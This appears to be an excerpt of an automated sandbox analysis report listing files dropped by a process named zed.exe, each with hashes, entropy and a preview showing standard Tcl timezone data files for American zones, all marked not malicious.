                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.9138787435596765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2905AJLr490ppv:MByMYbpwt290qJLr490b
                                                                                                                                                                                                                                            MD5:92B091A06198E233B73DF12DFCD818D5
                                                                                                                                                                                                                                            SHA1:C529488D09F86755E4F22CB4F0E3013C3A1B978D
                                                                                                                                                                                                                                            SHA-256:6CB1930532831D12057FCB484C60DB64A60A4F6D8195DAFD464826923116A294
                                                                                                                                                                                                                                            SHA-512:55EAE03CDECAC43BEDD3AA1A32C632A46808F29FF4D97A330F818544E4D10B9E9BA909D6627C38065EB7AC8E2C395FA37797F532CCFC8AB89D4698CCDE17F985
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Guadeloupe) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):399
                                                                                                                                                                                                                                            Entropy (8bit):4.513185345162455
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862906GGmdHKznC972f/uF+mP/uF+K67Jqd3/uF+eBxE/uF+DAWNv:5neQCgfS+6S+K67Yd3S+e0S+1
                                                                                                                                                                                                                                            MD5:569CDE7CE1AB84C0F16A25E85A418334
                                                                                                                                                                                                                                            SHA1:EADE79AB6EDD98C7FE8B10B480C5C530CA014F5C
                                                                                                                                                                                                                                            SHA-256:14F6A98D602F3648C816B110F3A0BA375E1FFE8FA06BEEAB419DC1ABFA6EDCAF
                                                                                                                                                                                                                                            SHA-512:AE2ACBF09EED857906811BE2984D6BF92BF2955A9FE2F9F3FFEBB6790902F5C2C870F8561CA13AD9CB7826EECA434BED7CFE7D0D2739996BACEE506D0EB730DC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guatemala) {.. {-9223372036854775808 -21724 0 LMT}.. {-1617040676 -21600 0 CST}.. {123055200 -18000 1 CDT}.. {130914000 -21600 0 CST}.. {422344800 -18000 1 CDT}.. {433054800 -21600 0 CST}.. {669708000 -18000 1 CDT}.. {684219600 -21600 0 CST}.. {1146376800 -18000 1 CDT}.. {1159678800 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):249
                                                                                                                                                                                                                                            Entropy (8bit):4.745656594295655
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2905xDm2OHHjGeoHv5laITicKpKV0EX/uFhfF/KVg:MB86290jmdHHLCv5FT/gOR/uFpF/Og
                                                                                                                                                                                                                                            MD5:DF661E312C6CE279CD6829120BE33CF2
                                                                                                                                                                                                                                            SHA1:4ACDB31E27EF9175C5452BF95F94F9BC280A237F
                                                                                                                                                                                                                                            SHA-256:6806AA5814BDC679C6EF653C518D2699114BE71D973F49C0864F622038DC2048
                                                                                                                                                                                                                                            SHA-512:04E7FD01F4DAD981EE8A02487F4A889015C41D07D6DCF420183D387E2188FF3239E345B5D65FB195CA485F5C7B4AD8CFEF51FFFC11EE0C91F0C88FF7B7EF17C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guayaquil) {.. {-9223372036854775808 -19160 0 LMT}.. {-2524502440 -18840 0 QMT}.. {-1230749160 -18000 0 -05}.. {722926800 -14400 1 -05}.. {728884800 -18000 0 -05}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):248
                                                                                                                                                                                                                                            Entropy (8bit):4.673559445766137
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2905R3SDm2OHRLx5oH8ZOXFxSyZ1yV/KMMdVVFAKFZ4KVR/ON:MB86290LGmdHBnC8ZODhyV/4d/OeZ4Ke
                                                                                                                                                                                                                                            MD5:F06C226D8D53EF8859AD91D7EBA5959C
                                                                                                                                                                                                                                            SHA1:E0B4E6F4ADCB10F1D79FFD928E8684FFE0C0DC5F
                                                                                                                                                                                                                                            SHA-256:4078D2E361D04A66F22F652E3810CDF7F630CF89399B47E4EC7B1D32B400FD85
                                                                                                                                                                                                                                            SHA-512:B4385650A0C69B7BD66415CC4BB9FCA854DBB1427E9F2D6C1D8CDB8CCEF9ECBD699C66A83A9AC289DABC5CDBB0A2B044E4097E9A2977AE1802B3BF6E2BB518CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Guyana) {.. {-9223372036854775808 -13959 0 LMT}.. {-1843589241 -14400 0 -04}.. {-1730577600 -13500 0 -0345}.. {176096700 -10800 0 -03}.. {701841600 -14400 0 -04}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11124
                                                                                                                                                                                                                                            Entropy (8bit):3.8106487461849885
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:YpQamC9XD81iWQSufutTLBCN8RWnWQ7Z/xVpmtBwXiCDLxcGMe++wzlrfFj10Kvn:2kXCvNc/1/CC
                                                                                                                                                                                                                                            MD5:6FB9E47841FF397CE36A36C8280E2089
                                                                                                                                                                                                                                            SHA1:DA210300DC3D94FC3D8BA0A4531341BCA5C5936C
                                                                                                                                                                                                                                            SHA-256:01E11C7B07925D05E9E1876C310A2B87E0E80EF115D062225212E472B7A964F1
                                                                                                                                                                                                                                            SHA-512:F61B5A8A7532BBD54A4976DF17A1C6CF51BCC6DC396482FBE169C3081AF27B6CA863F0CDE3E483C59F5A5BD3365592F6984A97173C736B41D3CEEDAD4263A4E5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Halifax) {.. {-9223372036854775808 -15264 0 LMT}.. {-2131645536 -14400 0 AST}.. {-1696276800 -10800 1 ADT}.. {-1680469200 -14400 0 AST}.. {-1640980800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1609444800 -14400 0 AST}.. {-1566763200 -10800 1 ADT}.. {-1557090000 -14400 0 AST}.. {-1535486400 -10800 1 ADT}.. {-1524949200 -14400 0 AST}.. {-1504468800 -10800 1 ADT}.. {-1493413200 -14400 0 AST}.. {-1472414400 -10800 1 ADT}.. {-1461963600 -14400 0 AST}.. {-1440964800 -10800 1 ADT}.. {-1429390800 -14400 0 AST}.. {-1409515200 -10800 1 ADT}.. {-1396731600 -14400 0 AST}.. {-1376856000 -10800 1 ADT}.. {-1366491600 -14400 0 AST}.. {-1346616000 -10800 1 ADT}.. {-1333832400 -14400 0 AST}.. {-1313956800 -10800 1 ADT}.. {-1303678800 -14400 0 AST}.. {-1282507200 -10800 1 ADT}.. {-1272661200 -14400 0 AST}.. {-1251057600
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8729
                                                                                                                                                                                                                                            Entropy (8bit):3.8227313494100867
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:BEsWduCtQA/gF6Y3Umjm67yLb5RCzhV28I:BBWACb/gF6Y3UmjBy7
                                                                                                                                                                                                                                            MD5:564980AECB32F5778422EA15E8956879
                                                                                                                                                                                                                                            SHA1:545209C95043721C1839CCE5FEFD1A6F2DE3FE5F
                                                                                                                                                                                                                                            SHA-256:96B62BFBF0C05CF970245597C691F89EBF631175796459642A85287F131D0215
                                                                                                                                                                                                                                            SHA-512:25FE5DAA55E3466EAE1CDC73918F189403C3360D4E82D72D745FA04A374DE04F479AA9811D6154FC70CC8EA620F18035EA6A3074116806D4405936FA017CE8E6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Havana) {.. {-9223372036854775808 -19768 0 LMT}.. {-2524501832 -19776 0 HMT}.. {-1402813824 -18000 0 CST}.. {-1311534000 -14400 1 CDT}.. {-1300996800 -18000 0 CST}.. {-933534000 -14400 1 CDT}.. {-925675200 -18000 0 CST}.. {-902084400 -14400 1 CDT}.. {-893620800 -18000 0 CST}.. {-870030000 -14400 1 CDT}.. {-862171200 -18000 0 CST}.. {-775681200 -14400 1 CDT}.. {-767822400 -18000 0 CST}.. {-744231600 -14400 1 CDT}.. {-736372800 -18000 0 CST}.. {-144702000 -14400 1 CDT}.. {-134251200 -18000 0 CST}.. {-113425200 -14400 1 CDT}.. {-102542400 -18000 0 CST}.. {-86295600 -14400 1 CDT}.. {-72907200 -18000 0 CST}.. {-54154800 -14400 1 CDT}.. {-41457600 -18000 0 CST}.. {-21495600 -14400 1 CDT}.. {-5774400 -18000 0 CST}.. {9954000 -14400 1 CDT}.. {25675200 -18000 0 CST}.. {41403600 -14400 1 CDT}.. {57729600 -18000 0 CST}.. {73458000 -14400 1 CD
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):616
                                                                                                                                                                                                                                            Entropy (8bit):4.351214377567366
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290e2mdH5NCtXwl3UXmMMmxL+voudQCvX70qKOV9kYNv:5Ie5k9WUQwuz/Vyu
                                                                                                                                                                                                                                            MD5:E35A6C6E9DCF0CA34BFA2993CE445D6C
                                                                                                                                                                                                                                            SHA1:4FF9C7EDBC73B1AE0815661571B7199379AF479C
                                                                                                                                                                                                                                            SHA-256:C0A87DC3A474D25083F0CEA0C323D8E780D937453CAD23C98AF367D81AC2CA2D
                                                                                                                                                                                                                                            SHA-512:56A728ABCD3EA91D2492E1331B3F76F31EF5675BCD95A692F9D94F91518B72569FD8DF1BB0515668E8A9BE0347018B391C65761D316903CA27C59883BBE0DE80
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Hermosillo) {.. {-9223372036854775808 -26632 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {915174000 -25200 0 MST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7230
                                                                                                                                                                                                                                            Entropy (8bit):3.882344472808608
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:nys0KHK1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:nyBKHkN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:7824B3F2D20F16A9DCC8E0F7DC45C1B8
                                                                                                                                                                                                                                            SHA1:77014A0502DA1342EFA41B64C5613839B627354B
                                                                                                                                                                                                                                            SHA-256:4B114545167326F066AB3A798180896B43AC6FDC3B80D32BCC917B5A4A2359EB
                                                                                                                                                                                                                                            SHA-512:03F6A18C03E79E9177D16CD7AB75AC117197638370FA675BC2854A5A563021F865F3F0672B237B83098787AB9D419AC33D67F28324B1E25AD8560B5838F70807
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Indianapolis) {.. {-9223372036854775808 -20678 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-900259200 -18000 1 CDT}.. {-891795600 -21600 0 CST}.. {-883591200 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8755
                                                                                                                                                                                                                                            Entropy (8bit):3.8394539560522585
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:+q2KeNrdJ8SvAgahLi8hDlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:+FKUdJ8SvPaUqbA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:8AF080A022DA0737E94742C50EAAC62E
                                                                                                                                                                                                                                            SHA1:704F0565B53AA8A20F70B79A7958D4D07085E07A
                                                                                                                                                                                                                                            SHA-256:F1253F5F3F5AACD1A5E1F4636DD4E083F4B2A8BD995CF3E684CDD384641849F1
                                                                                                                                                                                                                                            SHA-512:26AAF6D24B2E2B60451E19A514533DFAEC74F01F9B1AEB9F86690669C14130D77AE1CBFB9FC9091E1CD1FC1CBC2799BB05026DB68768C3CCB960355C18D111ED
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Knox) {.. {-9223372036854775808 -20790 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-725824800 -21600 0 CST}.. {-715795200 -18000 1 CDT}.. {-702493200 -21600 0 CST}.. {-684345600 -18000 1 CDT}.. {-671043600 -21600 0 CST}.. {-652896000 -18000 1 CDT}.. {-639594000 -21600 0 CST}.. {-620841600 -18000 1 CDT}.. {-608144400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-557942400 -18000 1 CDT}.. {-544640400 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-447267600 -21600 0 CST}.. {-431539200 -18000 1 CDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7273
                                                                                                                                                                                                                                            Entropy (8bit):3.8700915866109535
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:7qvrv7+X1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:7Kv7+bN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:C1A10440E6CCE4C5052E2510182D9AA7
                                                                                                                                                                                                                                            SHA1:56D4F3CCA1245D626BADA74CF3F6BAE8034BF58D
                                                                                                                                                                                                                                            SHA-256:675162381639598E7100E90663D42780F8EE1CB62BD6DA5B948B494F98C02FE3
                                                                                                                                                                                                                                            SHA-512:96B71472AD38ECFC589F935D9F5F1C8D42C8E942D8772FB6A77F9B9C0E2BD7A07FA61729E57EC02356121518E33797A784679F8DED2FCA3FC79F5C114783DD57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Marengo) {.. {-9223372036854775808 -20723 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-599594400 -21600 0 CST}.. {-589392000 -18000 1 CDT}.. {-576090000 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-463593600 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7611
                                                                                                                                                                                                                                            Entropy (8bit):3.87971256165061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:TqervJ8SUklggahyBRP0HY2iU7KKdFL6Aa2K4gSLf8e:TpvJ8SUklvaQN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:A86042668CD478AFFC05D3383EDEE8FF
                                                                                                                                                                                                                                            SHA1:6476526F94A247C0ECF3B2813F2C5A4FB93E457E
                                                                                                                                                                                                                                            SHA-256:23B8FA75CE0A9555DFD84549723A12679FF7FC5FAA58E4B745BA3C547071FF53
                                                                                                                                                                                                                                            SHA-512:07A5487A087108E6D6E88580865885CA6243EF04BE8263FC913F38CADB8EA016386E8BBAD39F65FD081F1A2F14316FEAF008855E9CF2019B169D9511916AFF67
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Petersburg) {.. {-9223372036854775808 -20947 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-473364000 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 1 CD
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7100
                                                                                                                                                                                                                                            Entropy (8bit):3.8613085681914607
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:yqxrvJ8SUklLgzNA604qSScBgN+4ctDzIVQ/c/3hNxTh:yUvJ8SUkl8BA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:E7FE9B7CFBC6505C446056967DEBC87B
                                                                                                                                                                                                                                            SHA1:81ADAD89F040F62E87D2F26D1D98B3E52710F695
                                                                                                                                                                                                                                            SHA-256:D368123DB703B55244700876906775837D408C274C5A5801D80B77EADB6D5853
                                                                                                                                                                                                                                            SHA-512:9C0746DE18C80B548AA443D59BB9971BDC304975717C5FCDEBDE72828ACF408FA1D687F87C42E7B8D6D0284C9F792EA236BF79C815947BE773D07364B630AC99
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Tell_City) {.. {-9223372036854775808 -20823 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-292438800 -21600 0 CST}.. {-273686400 -18000 1 CDT}.. {-257965200 -21600 0 CST}.. {-242236800 -18000 1 CDT}.. {-226515600 -21600 0 CST}.. {-210787200 -18000 1 CDT}.. {-195066000 -21600 0 CST}.. {-179337600 -18000 0 EST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6563
                                                                                                                                                                                                                                            Entropy (8bit):3.866646181493734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:juqv01BRP0HY2iU7KKdFL6Aa2K4gSLf8e:CoKN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:2CCFC3980C321ED8A852759C0BCCB12C
                                                                                                                                                                                                                                            SHA1:A8BFE02E4E71B28EF8E284E808F6EDE7C231F8FF
                                                                                                                                                                                                                                            SHA-256:0623233AA39A1A82038A56DF255ADF49E648777375B8499491C8897EBEA1CDF1
                                                                                                                                                                                                                                            SHA-512:A4C77689BC9BF871C756D05BAC4157F0FD324D10AC7D15F3543344C6F8C7FC9218AB7ADFBCE70C8ECCDD6EC15FD7960503FC7A8223FECE6D4227BF0BB04190C7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vevay) {.. {-9223372036854775808 -20416 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-495043200 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {-21488400 -14400 1 EDT}.. {-5767200 -18000 0 EST}.. {9961200 -14400 1 EDT}.. {25682400 -18000 0 EST}.. {41410800 -14400 1 EDT}.. {57736800 -18000 0 EST}.. {73465200 -14400 1 EDT}.. {89186400 -18000 0 EST}.. {94712400 -18000 0 EST}.. {1136091600 -18000 0 EST}.. {1143961200 -14400 1 EDT}.. {1162101600 -18000 0 EST}.. {1173596400 -14400 1 EDT}.. {1194156000 -18000 0 EST}.. {1205046000 -14400 1 EDT}.. {1225605600 -18000 0 EST}.. {1236495600 -14400 1 EDT}.. {1257055200 -18000 0 EST}.. {1268550000 -144
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7226
                                                                                                                                                                                                                                            Entropy (8bit):3.879195938909716
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Vq8rdJ5UklpRBRP0HY2iU7KKdFL6Aa2K4gSLf8e:VbdJ5Uklp/N0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:56D1930F5FAE2456DEC6C9AB1B0233E1
                                                                                                                                                                                                                                            SHA1:F6ED52EF769DF2C015C181BCFF3DC0E24497C768
                                                                                                                                                                                                                                            SHA-256:B8452B6AA739A78AC6D03806463B03D4175639593E19FAA3CA4B0D0FB77F18C9
                                                                                                                                                                                                                                            SHA-512:AFCFF383DB441DA9154B639A88700D0604F487A20E830146B14061E485A991AD8DC279AF8C0C2329265CF14C901207B9058157FAA1C039082EB7630916834156
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Indiana/Vincennes) {.. {-9223372036854775808 -21007 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-526492800 -18000 1 CDT}.. {-513190800 -21600 0 CST}.. {-495043200 -18000 1 CDT}.. {-481741200 -21600 0 CST}.. {-462996000 -18000 1 CDT}.. {-450291600 -21600 0 CST}.. {-431539200 -18000 1 CDT}.. {-418237200 -21600 0 CST}.. {-400089600 -18000 1 CDT}.. {-386787600 -21600 0 CST}.. {-368640000 -18000 1 CDT}.. {-355338000 -21600 0 CST}.. {-337190400 -18000 1 CDT}.. {-323888400 -21600 0 CST}.. {-305740800 -18000 1 CDT}.. {-289414800 -21600 0 CST}.. {-273686400 -18000 1 CDT
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7410
                                                                                                                                                                                                                                            Entropy (8bit):3.8775722319777968
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:uq0KeKrv7c1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:unKxv7yN0HY2iUmUFLqU
                                                                                                                                                                                                                                            MD5:880526DC23E7BDB00506D7EC2A885907
                                                                                                                                                                                                                                            SHA1:DB3B13A2A4BF80E7B71C7F0604A0A80EF070B9BA
                                                                                                                                                                                                                                            SHA-256:4B293FDB7680C4597B8C885333719214492ECF09BD5EA342D1EC15F2BF9C8605
                                                                                                                                                                                                                                            SHA-512:42EEDC5EA28781D62A457F4843F38D0A3FEFCAD83BA01B07CEF0FA169C6440960E04BABD272C5E9AF2F4B0DBB2A786EF9221A48F084F16752E6D0EA66C31911E
                                                                                                                                                                                                                                            Malicious:false
